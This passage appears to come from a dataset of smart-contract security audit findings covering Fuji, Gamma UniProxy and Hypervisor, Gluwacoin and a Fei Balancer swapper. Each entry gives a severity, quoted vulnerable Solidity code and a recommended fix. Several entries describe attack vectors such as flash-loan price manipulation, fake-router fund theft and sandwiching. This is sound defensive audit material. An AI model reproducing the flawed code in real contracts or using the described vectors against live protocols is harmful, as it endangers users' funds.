address constant wftm = 0x21be370D5312f44cB42ce377BC9b8a0cEF1A4C83;\\n\\n receive() external payable {}\\n\\n /\\*\\*\\n \\* @notice Convert WFTM to FTM and transfer to msg.sender\\n \\* @dev msg.sender needs to send WFTM before calling this withdraw\\n \\* @param \\_amount amount to withdraw.\\n \\*/\\n function withdraw(uint256 \\_amount) external {\\n IWETH(wftm).withdraw(\\_amount);\\n (bool sent, ) = msg.sender.call{ value: \\_amount }(\"\");\\n require(sent, \"Failed to send FTM\");\\n }\\n}\\n```\\n\\nThe `WFTM` contract on Fantom returns an error return value. The error return value cannot be checked when utilizing the `IWETH` interface for `WFTM`. The error return values are never checked throughout the system for `WFTM` operations. This might be intentional to allow `amount=0` on `WETH` to act as a NOOP similar to `WETH`.\\n```\\n// convert FTM to WFTM\\nif (isFtm) IWETH(\\_tokenAddr).deposit{ value: \\_amount }();\\n```\\n\\nAlso see issues: issue 4.4, issue 4.5, issue 4.10чWe recommend using the correct interfaces for all contracts instead of partial stubs. Do not modify the original function declarations, e.g., by omitting return value declarations. The codebase should also check return values where possible or explicitly state why values can safely be ignored in inline comments or the function's natspec documentation block.чч```\\ncontract WFTMUnwrapper {\\n address constant wftm = 0x21be370D5312f44cB42ce377BC9b8a0cEF1A4C83;\\n\\n receive() external payable {}\\n\\n /\\*\\*\\n \\* @notice Convert WFTM to FTM and transfer to msg.sender\\n \\* @dev msg.sender needs to send WFTM before calling this withdraw\\n \\* @param \\_amount amount to withdraw.\\n \\*/\\n function withdraw(uint256 \\_amount) external {\\n IWETH(wftm).withdraw(\\_amount);\\n (bool sent, ) = msg.sender.call{ value: \\_amount }(\"\");\\n require(sent, \"Failed to send FTM\");\\n }\\n}\\n```\\n -Inconsistent isFTM, isETH checksчlowч`LibUniversalERC20FTM.isFTM()` and `LibUniversalERC20.isETH()` identifies native assets by matching against two distinct addresses while some components only check for one.\\nThe same is true for `FTM`.\\n`Flasher` only identifies a native `asset` transfer by matching `asset` against `_ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` while `univTransfer()` identifies it using `0x0 || 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE`\\n```\\nfunction callFunction(\\n address sender,\\n Account.Info calldata account,\\n bytes calldata data\\n) external override {\\n require(msg.sender == \\_dydxSoloMargin && sender == address(this), Errors.VL\\_NOT\\_AUTHORIZED);\\n account;\\n\\n FlashLoan.Info memory info = abi.decode(data, (FlashLoan.Info));\\n\\n uint256 \\_value;\\n if (info.asset == \\_ETH) {\\n // Convert WETH to ETH and assign amount to be set as msg.value\\n \\_convertWethToEth(info.amount);\\n \\_value = info.amount;\\n } else {\\n // Transfer to Vault the flashloan Amount\\n // \\_value is 0\\n IERC20(info.asset).univTransfer(payable(info.vault), info.amount);\\n }\\n```\\n\\n`LibUniversalERC20`\\n```\\nlibrary LibUniversalERC20 {\\n using SafeERC20 for IERC20;\\n\\n IERC20 private constant \\_ETH\\_ADDRESS = IERC20(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE);\\n IERC20 private constant \\_ZERO\\_ADDRESS = IERC20(0x0000000000000000000000000000000000000000);\\n\\n function isETH(IERC20 token) internal pure returns (bool) {\\n return (token == \\_ZERO\\_ADDRESS || token == \\_ETH\\_ADDRESS);\\n }\\n```\\n\\n```\\nfunction univTransfer(\\n IERC20 token,\\n address payable to,\\n uint256 amount\\n) internal {\\n if (amount > 0) {\\n if (isETH(token)) {\\n (bool sent, ) = to.call{ value: amount }(\"\");\\n require(sent, \"Failed to send Ether\");\\n } else {\\n token.safeTransfer(to, amount);\\n }\\n }\\n}\\n```\\n\\nThere are multiple other instances of this\\n```\\nuint256 \\_value = vAssets.borrowAsset == ETH ? debtTotal : 0;\\n```\\nчConsider using a consistent way to identify native asset transfers (i.e. `ETH`, FTM) by using `LibUniversalERC20.isETH()`. Alternatively, the system can be greatly simplified by expecting WFTM and only working with it. This simplification will remove all special cases where the library must handle non-ERC20 interfaces.чч```\\nfunction callFunction(\\n address sender,\\n Account.Info calldata account,\\n bytes calldata data\\n) external override {\\n require(msg.sender == \\_dydxSoloMargin && sender == address(this), Errors.VL\\_NOT\\_AUTHORIZED);\\n account;\\n\\n FlashLoan.Info memory info = abi.decode(data, (FlashLoan.Info));\\n\\n uint256 \\_value;\\n if (info.asset == \\_ETH) {\\n // Convert WETH to ETH and assign amount to be set as msg.value\\n \\_convertWethToEth(info.amount);\\n \\_value = info.amount;\\n } else {\\n // Transfer to Vault the flashloan Amount\\n // \\_value is 0\\n IERC20(info.asset).univTransfer(payable(info.vault), info.amount);\\n }\\n```\\n -FujiOracle - setPriceFeed should check asset and priceFeed decimalsчlowч`getPriceOf()` assumes that all price feeds return prices with identical decimals, but `setPriceFeed` does not enforce this. Potential misconfigurations can have severe effects on the system's internal accounting.\\n```\\n/\\*\\*\\n \\* @dev Sets '\\_priceFeed' address for a '\\_asset'.\\n \\* Can only be called by the contract owner.\\n \\* Emits a {AssetPriceFeedChanged} event.\\n \\*/\\nfunction setPriceFeed(address \\_asset, address \\_priceFeed) public onlyOwner {\\n require(\\_priceFeed != address(0), Errors.VL\\_ZERO\\_ADDR);\\n usdPriceFeeds[\\_asset] = \\_priceFeed;\\n emit AssetPriceFeedChanged(\\_asset, \\_priceFeed);\\n}\\n```\\nчWe recommend adding additional checks to detect unexpected changes in assets' properties. Safeguard price feeds by enforcing `priceFeed` == address(0) || priceFeed.decimals() == `8`. This allows the owner to disable a `priceFeed` (setting it to zero) and otherwise ensure that the feed is compatible and indeed returns `8` decimals.чч```\\n/\\*\\*\\n \\* @dev Sets '\\_priceFeed' address for a '\\_asset'.\\n \\* Can only be called by the contract owner.\\n \\* Emits a {AssetPriceFeedChanged} event.\\n \\*/\\nfunction setPriceFeed(address \\_asset, address \\_priceFeed) public onlyOwner {\\n require(\\_priceFeed != address(0), Errors.VL\\_ZERO\\_ADDR);\\n usdPriceFeeds[\\_asset] = \\_priceFeed;\\n emit AssetPriceFeedChanged(\\_asset, \\_priceFeed);\\n}\\n```\\n -UniProxy.depositSwap - Tokens are not approved before calling Router.exactInputчhighчthe call to Router.exactInputrequires the sender to pre-approve the tokens. We could not find any reference for that, thus we assume that a call to `UniProxy.depositSwap` will always revert.\\n```\\nrouter = ISwapRouter(\\_router);\\nuint256 amountOut;\\nuint256 swap;\\nif(swapAmount < 0) {\\n //swap token1 for token0\\n\\n swap = uint256(swapAmount \\* -1);\\n IHypervisor(pos).token1().transferFrom(msg.sender, address(this), deposit1+swap);\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit0\\n )\\n );\\n}\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n```\\nчResolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `depositSwap` function.\\nConsider approving the exact amount of input tokens before the swap.чч```\\nrouter = ISwapRouter(\\_router);\\nuint256 amountOut;\\nuint256 swap;\\nif(swapAmount < 0) {\\n //swap token1 for token0\\n\\n swap = uint256(swapAmount \\* -1);\\n IHypervisor(pos).token1().transferFrom(msg.sender, address(this), deposit1+swap);\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit0\\n )\\n );\\n}\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n```\\n -Uniproxy.depositSwap - _router should not be determined by the callerчhighч`Uniproxy.depositSwap` uses `_router` that is determined by the caller, which in turn might inject a “fake” contract, and thus may steal funds stuck in the `UniProxy` contract.\\nThe `UniProxy` contract has certain trust assumptions regarding the router. The router is supposed to return not less than deposit1(or deposit0) amount of tokens but that fact is never checked.\\n```\\nfunction depositSwap(\\n int256 swapAmount, // (-) token1, (+) token0 for token1; amount to swap\\n uint256 deposit0,\\n uint256 deposit1,\\n address to,\\n address from,\\n bytes memory path,\\n address pos,\\n address \\_router\\n) external returns (uint256 shares) {\\n```\\nчConsider removing the `_router` parameter from the function, and instead, use a storage variable that will be initialized in the constructor.чч```\\nfunction depositSwap(\\n int256 swapAmount, // (-) token1, (+) token0 for token1; amount to swap\\n uint256 deposit0,\\n uint256 deposit1,\\n address to,\\n address from,\\n bytes memory path,\\n address pos,\\n address \\_router\\n) external returns (uint256 shares) {\\n```\\n -Re-entrancy + flash loan attack can invalidate price checkчhighчThe `UniProxy` contract has a price manipulation protection:\\n```\\nif (twapCheck || positions[pos].twapOverride) {\\n // check twap\\n checkPriceChange(\\n pos,\\n (positions[pos].twapOverride ? positions[pos].twapInterval : twapInterval),\\n (positions[pos].twapOverride ? positions[pos].priceThreshold : priceThreshold)\\n );\\n}\\n```\\n\\nBut after that, the tokens are transferred from the user, if the token transfer allows an attacker to hijack the call-flow of the transaction inside, the attacker can manipulate the Uniswap price there, after the check happened. The Hypervisor's `deposit` function itself is vulnerable to the flash-loan attack.чMake sure the price does not change before the `Hypervisor.deposit` call. For example, the token transfers can be made at the beginning of the `UniProxy.deposit` function.чч```\\nif (twapCheck || positions[pos].twapOverride) {\\n // check twap\\n checkPriceChange(\\n pos,\\n (positions[pos].twapOverride ? positions[pos].twapInterval : twapInterval),\\n (positions[pos].twapOverride ? positions[pos].priceThreshold : priceThreshold)\\n );\\n}\\n```\\n -UniProxy.properDepositRatio - Proper ratio will not prevent liquidity imbalance for all possible scenariosчhighч`UniProxy.properDepositRatio` purpose is to be used as a mechanism to prevent liquidity imbalance. The idea is to compare the deposit ratio with the `hypeRatio`, which is the ratio between the tokens held by the `Hypervisor` contract. In practice, however, this function will not prevent a skewed deposit ratio in many cases. `deposit1 / deposit0` might be a huge number, while `10^16 <= depositRatio <= 10^18`, and 10^16 <= `hypeRatio` <= 10^18. Let us consider the case where `hype1 / hype0 >= 10`, that means `hypeRatio = 10^18`, and now if `deposit1 / deposit0` = 10^200 for example, `depositRatio = 10^18`, and the transaction will pass, which is clearly not intended.\\n```\\nfunction properDepositRatio(\\n address pos,\\n uint256 deposit0,\\n uint256 deposit1\\n) public view returns (bool) {\\n (uint256 hype0, uint256 hype1) = IHypervisor(pos).getTotalAmounts();\\n if (IHypervisor(pos).totalSupply() != 0) {\\n uint256 depositRatio = deposit0 == 0 ? 10e18 : deposit1.mul(1e18).div(deposit0);\\n depositRatio = depositRatio > 10e18 ? 10e18 : depositRatio;\\n depositRatio = depositRatio < 10e16 ? 10e16 : depositRatio;\\n uint256 hypeRatio = hype0 == 0 ? 10e18 : hype1.mul(1e18).div(hype0);\\n hypeRatio = hypeRatio > 10e18 ? 10e18 : hypeRatio;\\n hypeRatio = hypeRatio < 10e16 ? 10e16 : hypeRatio;\\n return (FullMath.mulDiv(depositRatio, deltaScale, hypeRatio) < depositDelta &&\\n FullMath.mulDiv(hypeRatio, deltaScale, depositRatio) < depositDelta);\\n }\\n return true;\\n}\\n```\\nчResolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `properDepositRatio` function.\\nConsider removing the cap of [0.1,10] both for `depositRatio` and for `hypeRatio`.чч```\\nfunction properDepositRatio(\\n address pos,\\n uint256 deposit0,\\n uint256 deposit1\\n) public view returns (bool) {\\n (uint256 hype0, uint256 hype1) = IHypervisor(pos).getTotalAmounts();\\n if (IHypervisor(pos).totalSupply() != 0) {\\n uint256 depositRatio = deposit0 == 0 ? 10e18 : deposit1.mul(1e18).div(deposit0);\\n depositRatio = depositRatio > 10e18 ? 10e18 : depositRatio;\\n depositRatio = depositRatio < 10e16 ? 10e16 : depositRatio;\\n uint256 hypeRatio = hype0 == 0 ? 10e18 : hype1.mul(1e18).div(hype0);\\n hypeRatio = hypeRatio > 10e18 ? 10e18 : hypeRatio;\\n hypeRatio = hypeRatio < 10e16 ? 10e16 : hypeRatio;\\n return (FullMath.mulDiv(depositRatio, deltaScale, hypeRatio) < depositDelta &&\\n FullMath.mulDiv(hypeRatio, deltaScale, depositRatio) < depositDelta);\\n }\\n return true;\\n}\\n```\\n -UniProxy.depositSwap doesn't deposit all the users' fundsчmediumчWhen executing the swap, the minimal amount out is passed to the router (deposit1 in this example), but the actual swap amount will be `amountOut`. But after the trade, instead of depositing `amountOut`, the contract tries to deposit `deposit1`, which is lower. This may result in some users' funds staying in the `UniProxy` contract.\\n```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, \"Swap failed\");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\nчResolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `depositSwap` function.\\nDeposit all the user's funds to the Hypervisor.чч```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, \"Swap failed\");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\n -Hypervisor - Multiple “sandwiching” front running vectorsчmediumчThe amount of tokens received from `UniswapV3Pool` functions might be manipulated by front-runners due to the decentralized nature of AMMs, where the order of transactions can not be pre-determined. A potential “sandwicher” may insert a buying order before the user's call to `Hypervisor.rebalance` for instance, and a sell order after.\\nMore specifically, calls to `pool.swap`, `pool.mint`, `pool.burn` are susceptible to “sandwiching” vectors.\\n`Hypervisor.rebalance`\\n```\\nif (swapQuantity != 0) {\\n pool.swap(\\n address(this),\\n swapQuantity > 0,\\n swapQuantity > 0 ? swapQuantity : -swapQuantity,\\n swapQuantity > 0 ? TickMath.MIN\\_SQRT\\_RATIO + 1 : TickMath.MAX\\_SQRT\\_RATIO - 1,\\n abi.encode(address(this))\\n );\\n}\\n```\\n\\n```\\nfunction \\_mintLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n address payer\\n) internal returns (uint256 amount0, uint256 amount1) {\\n if (liquidity > 0) {\\n (amount0, amount1) = pool.mint(\\n address(this),\\n tickLower,\\n tickUpper,\\n liquidity,\\n abi.encode(payer)\\n );\\n }\\n}\\n```\\n\\n```\\nfunction \\_burnLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n address to,\\n bool collectAll\\n) internal returns (uint256 amount0, uint256 amount1) {\\n if (liquidity > 0) {\\n // Burn liquidity\\n (uint256 owed0, uint256 owed1) = pool.burn(tickLower, tickUpper, liquidity);\\n\\n // Collect amount owed\\n uint128 collect0 = collectAll ? type(uint128).max : \\_uint128Safe(owed0);\\n uint128 collect1 = collectAll ? type(uint128).max : \\_uint128Safe(owed1);\\n if (collect0 > 0 || collect1 > 0) {\\n (amount0, amount1) = pool.collect(to, tickLower, tickUpper, collect0, collect1);\\n }\\n }\\n}\\n```\\nчConsider adding an `amountMin` parameter(s) to ensure that at least the `amountMin` of tokens was received.чч```\\nif (swapQuantity != 0) {\\n pool.swap(\\n address(this),\\n swapQuantity > 0,\\n swapQuantity > 0 ? swapQuantity : -swapQuantity,\\n swapQuantity > 0 ? TickMath.MIN\\_SQRT\\_RATIO + 1 : TickMath.MAX\\_SQRT\\_RATIO - 1,\\n abi.encode(address(this))\\n );\\n}\\n```\\n -Uniswap v3 callbacks access control should be hardenedчlowчResolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by implementing the auditor's recommendation for `uniswapV3MintCallback`, and deleting `uniswapV3SwapCallback` and the call to `pool.swap`.\\nUniswap v3 uses a callback pattern to pull funds from the caller. The caller, (in this case Hypervisor) has to implement a callback function which will be called by the Uniswap's `pool`. Both `uniswapV3MintCallback` and `uniswapV3SwapCallback` restrict the access to the callback functions only for the `pool`. However, this alone will not block a random call from the `pool` contract in case the latter was hacked, which will result in stealing all the funds held in `Hypervisor` or of any user that approved the `Hypervisor` contract to transfer tokens on his behalf.\\n```\\nfunction uniswapV3MintCallback(\\n uint256 amount0,\\n uint256 amount1,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (payer == address(this)) {\\n if (amount0 > 0) token0.safeTransfer(msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransfer(msg.sender, amount1);\\n } else {\\n if (amount0 > 0) token0.safeTransferFrom(payer, msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransferFrom(payer, msg.sender, amount1);\\n }\\n}\\n\\nfunction uniswapV3SwapCallback(\\n int256 amount0Delta,\\n int256 amount1Delta,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (amount0Delta > 0) {\\n if (payer == address(this)) {\\n token0.safeTransfer(msg.sender, uint256(amount0Delta));\\n } else {\\n token0.safeTransferFrom(payer, msg.sender, uint256(amount0Delta));\\n }\\n } else if (amount1Delta > 0) {\\n if (payer == address(this)) {\\n token1.safeTransfer(msg.sender, uint256(amount1Delta));\\n } else {\\n token1.safeTransferFrom(payer, msg.sender, uint256(amount1Delta));\\n }\\n }\\n}\\n```\\nчConsider adding (boolean) storage variables that will help to track whether a call to `uniswapV3MintCallback | uniswapV3SwapCallback` was preceded by a call to `_mintLiquidity | rebalance` respectively. An example for the `rebalance` function would be bool `rebalanceCalled`, this variable will be assigned a `true` value in `rebalance` before the external call of `pool.swap`, then `uniswapV3SwapCallback` will require that `rebalanceCalled` == `true`, and then right after `rebalanceCalled` will be assigned a `false` value.чч```\\nfunction uniswapV3MintCallback(\\n uint256 amount0,\\n uint256 amount1,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (payer == address(this)) {\\n if (amount0 > 0) token0.safeTransfer(msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransfer(msg.sender, amount1);\\n } else {\\n if (amount0 > 0) token0.safeTransferFrom(payer, msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransferFrom(payer, msg.sender, amount1);\\n }\\n}\\n\\nfunction uniswapV3SwapCallback(\\n int256 amount0Delta,\\n int256 amount1Delta,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (amount0Delta > 0) {\\n if (payer == address(this)) {\\n token0.safeTransfer(msg.sender, uint256(amount0Delta));\\n } else {\\n token0.safeTransferFrom(payer, msg.sender, uint256(amount0Delta));\\n }\\n } else if (amount1Delta > 0) {\\n if (payer == address(this)) {\\n token1.safeTransfer(msg.sender, uint256(amount1Delta));\\n } else {\\n token1.safeTransferFrom(payer, msg.sender, uint256(amount1Delta));\\n }\\n }\\n}\\n```\\n -UniProxy.depositSwap doesn't deposit all the users' fundsчmediumчResolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `depositSwap` function.\\nWhen executing the swap, the minimal amount out is passed to the router (deposit1 in this example), but the actual swap amount will be `amountOut`. But after the trade, instead of depositing `amountOut`, the contract tries to deposit `deposit1`, which is lower. This may result in some users' funds staying in the `UniProxy` contract.\\n```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, \"Swap failed\");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\nчDeposit all the user's funds to the Hypervisor.чч```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, \"Swap failed\");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\n -Initialization flawsчlowчFor non-upgradeable contracts, the Solidity compiler takes care of chaining the constructor calls of an inheritance hierarchy in the right order; for upgradeable contracts, taking care of initialization is a manual task - and with extensive use of inheritance, it is tedious and error-prone. The convention in OpenZeppelin Contracts Upgradeable is to have a `__C_init_unchained` function that contains the actual initialization logic for contract `C` and a `__C_init` function that calls the `*_init_unchained` function for every super-contract - direct and indirect - in the inheritance hierarchy (including C) in the C3-linearized order from most basic to most derived. This pattern imitates what the compiler does for constructors.\\nAll `*_init` functions in the contracts (__ERC20WrapperGluwacoin_init, `__ERC20Reservable_init`, `__ERC20ETHless_init`, and __ERC20Wrapper_init) are missing some `_init_unchained` calls, and sometimes the existing calls are not in the correct order.\\nThe `__ERC20WrapperGluwacoin_init` function is implemented as follows:\\n```\\nfunction \\_\\_ERC20WrapperGluwacoin\\_init(\\n string memory name,\\n string memory symbol,\\n IERC20 token\\n) internal initializer {\\n \\_\\_Context\\_init\\_unchained();\\n \\_\\_ERC20\\_init\\_unchained(name, symbol);\\n \\_\\_ERC20ETHless\\_init\\_unchained();\\n \\_\\_ERC20Reservable\\_init\\_unchained();\\n \\_\\_AccessControlEnumerable\\_init\\_unchained();\\n \\_\\_ERC20Wrapper\\_init\\_unchained(token);\\n \\_\\_ERC20WrapperGluwacoin\\_init\\_unchained();\\n}\\n```\\n\\nAnd the C3 linearization is:\\n```\\nERC20WrapperGluwacoin\\n ↖ ERC20Reservable\\n ↖ ERC20ETHless\\n ↖ ERC20Wrapper\\n ↖ ERC20Upgradeable\\n ↖ IERC20MetadataUpgradeable\\n ↖ IERC20Upgradeable\\n ↖ AccessControlEnumerableUpgradeable\\n ↖ AccessControlUpgradeable\\n ↖ ERC165Upgradeable\\n ↖ IERC165Upgradeable\\n ↖ IAccessControlEnumerableUpgradeable\\n ↖ IAccessControlUpgradeable\\n ↖ ContextUpgradeable\\n ↖ Initializable\\n```\\n\\nThe calls `__ERC165_init_unchained();` and `__AccessControl_init_unchained();` are missing, and `__ERC20Wrapper_init_unchained(token);` should move between `__ERC20_init_unchained(name, symbol);` and `__ERC20ETHless_init_unchained();`.чReview all `*_init` functions, add the missing `*_init_unchained` calls, and fix the order of these calls.чч```\\nfunction \\_\\_ERC20WrapperGluwacoin\\_init(\\n string memory name,\\n string memory symbol,\\n IERC20 token\\n) internal initializer {\\n \\_\\_Context\\_init\\_unchained();\\n \\_\\_ERC20\\_init\\_unchained(name, symbol);\\n \\_\\_ERC20ETHless\\_init\\_unchained();\\n \\_\\_ERC20Reservable\\_init\\_unchained();\\n \\_\\_AccessControlEnumerable\\_init\\_unchained();\\n \\_\\_ERC20Wrapper\\_init\\_unchained(token);\\n \\_\\_ERC20WrapperGluwacoin\\_init\\_unchained();\\n}\\n```\\n -Flaw in _beforeTokenTransfer call chain and missing testsчlowчIn OpenZeppelin's ERC-20 implementation, the virtual `_beforeTokenTransfer` function provides a hook that is called before tokens are transferred, minted, or burned. In the Gluwacoin codebase, it is used to check whether the unreserved balance (as opposed to the regular balance, which is checked by the ERC-20 implementation) of the sender is sufficient to allow this transfer or burning.\\nIn `ERC20WrapperGluwacoin`, `ERC20Reservable`, and `ERC20Wrapper`, the `_beforeTokenTransfer` function is implemented in the following way:\\n```\\nfunction \\_beforeTokenTransfer(\\n address from,\\n address to,\\n uint256 amount\\n) internal override(ERC20Upgradeable, ERC20Wrapper, ERC20Reservable) {\\n ERC20Wrapper.\\_beforeTokenTransfer(from, to, amount);\\n ERC20Reservable.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override (ERC20Upgradeable) {\\n if (from != address(0)) {\\n require(\\_unreservedBalance(from) >= amount, \"ERC20Reservable: transfer amount exceeds unreserved balance\");\\n }\\n\\n super.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override (ERC20Upgradeable) {\\n super.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n\\nFinally, the C3-linearization of the contracts is:\\n```\\nERC20WrapperGluwacoin\\n ↖ ERC20Reservable\\n ↖ ERC20ETHless\\n ↖ ERC20Wrapper\\n ↖ ERC20Upgradeable\\n ↖ IERC20MetadataUpgradeable\\n ↖ IERC20Upgradeable\\n ↖ AccessControlEnumerableUpgradeable\\n ↖ AccessControlUpgradeable\\n ↖ ERC165Upgradeable\\n ↖ IERC165Upgradeable\\n ↖ IAccessControlEnumerableUpgradeable\\n ↖ IAccessControlUpgradeable\\n ↖ ContextUpgradeable\\n ↖ Initializable\\n```\\n\\nThis means `ERC20Wrapper._beforeTokenTransfer` is ultimately called twice - once directly in `ERC20WrapperGluwacoin._beforeTokenTransfer` and then a second time because the `super._beforeTokenTransfer` call in `ERC20Reservable._beforeTokenTransfer` resolves to `ERC20Wrapper._beforeTokenTransfer`. (ERC20ETHless doesn't override _beforeTokenTransfer.)\\nMoreover, while reviewing the correctness and coverage of the tests is not in scope for this engagement, we happened to notice that there are no tests that check whether the unreserved balance is sufficient for transferring or burning tokens.ч`ERC20WrapperGluwacoin._beforeTokenTransfer` should just call `super._beforeTokenTransfer`. Moreover, the `_beforeTokenTransfer` implementation can be removed from `ERC20Wrapper`.\\nWe would like to stress the importance of careful and comprehensive testing in general and of this functionality in particular, as it is crucial for the system's integrity. We also encourage investigating whether there are more such omissions and an evaluation of the test quality and coverage in general.чч```\\nfunction \\_beforeTokenTransfer(\\n address from,\\n address to,\\n uint256 amount\\n) internal override(ERC20Upgradeable, ERC20Wrapper, ERC20Reservable) {\\n ERC20Wrapper.\\_beforeTokenTransfer(from, to, amount);\\n ERC20Reservable.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n -Hard-coded decimalsчlowчThe Gluwacoin wrapper token should have the same number of decimals as the wrapped ERC-20. Currently, the number of decimals is hard-coded to 6. This limits flexibility or requires source code changes and recompilation if a token with a different number of decimals is to be wrapped.\\n```\\nfunction decimals() public pure override returns (uint8) {\\n return 6;\\n}\\n```\\nчWe recommend supplying the number of `decimals` as an initialization parameter and storing it in a state variable. That increases gas consumption of the `decimals` function, but we doubt this view function will be frequently called from a contract, and even if it was, we think the benefits far outweigh the costs.\\nMoreover, we believe the `decimals` logic (i.e., function `decimals` and the new state variable) should be implemented in the `ERC20Wrapper` contract - which holds the basic ERC-20 functionality of the wrapper token - and not in `ERC20WrapperGluwacoin`, which is the base contract of the entire system.чч```\\nfunction decimals() public pure override returns (uint8) {\\n return 6;\\n}\\n```\\n -Re-initialization of the Balancer pool is potentially possibleчlowчInstead of creating a new Balancer pool for an auction every time, the same pool is getting re-used repeatedly. When this happens, the old liquidity is withdrawn, and if there is enough FEI in the contract, the weights are shifted pool is filled with new tokens. If there is not enough FEI, the pool is left empty, and users can still interact with it. When there's enough FEI again, it's re-initialized again, which is not the intention:\\n```\\nuint256 bptTotal = pool.totalSupply();\\nuint256 bptBalance = pool.balanceOf(address(this));\\n\\n// Balancer locks a small amount of bptTotal after init, so 0 bpt means pool needs initializing\\nif (bptTotal == 0) {\\n \\_initializePool();\\n return;\\n}\\n```\\n\\nTheoretically, this will never happen because there should be minimal leftover liquidity tokens after the withdrawal. But we couldn't strictly verify that fact because it requires looking into balancer code much deeper.чOne of the options would be only to allow re-using the pool in atomic transactions. So if there are not enough FEI tokens for the next auction, the `swap` transaction reverts. That will help with another issue (issue 3.2) too.чч```\\nuint256 bptTotal = pool.totalSupply();\\nuint256 bptBalance = pool.balanceOf(address(this));\\n\\n// Balancer locks a small amount of bptTotal after init, so 0 bpt means pool needs initializing\\nif (bptTotal == 0) {\\n \\_initializePool();\\n return;\\n}\\n```\\n -The BalancerLBPSwapper may not have enough Tribe tokensчlowчWhenever the `swap` function is called, it should re-initialize the Balancer pool that requires adding liquidity: 99% Fei and 1% Tribe. So the Tribe should initially be in the contract.\\n```\\nfunction \\_getTokensIn(uint256 spentTokenBalance) internal view returns(uint256[] memory amountsIn) {\\n amountsIn = new uint256[](2);\\n\\n uint256 receivedTokenBalance = readOracle().mul(spentTokenBalance).mul(ONE\\_PERCENT).div(NINETY\\_NINE\\_PERCENT).asUint256();\\n\\n if (address(assets[0]) == tokenSpent) {\\n amountsIn[0] = spentTokenBalance;\\n amountsIn[1] = 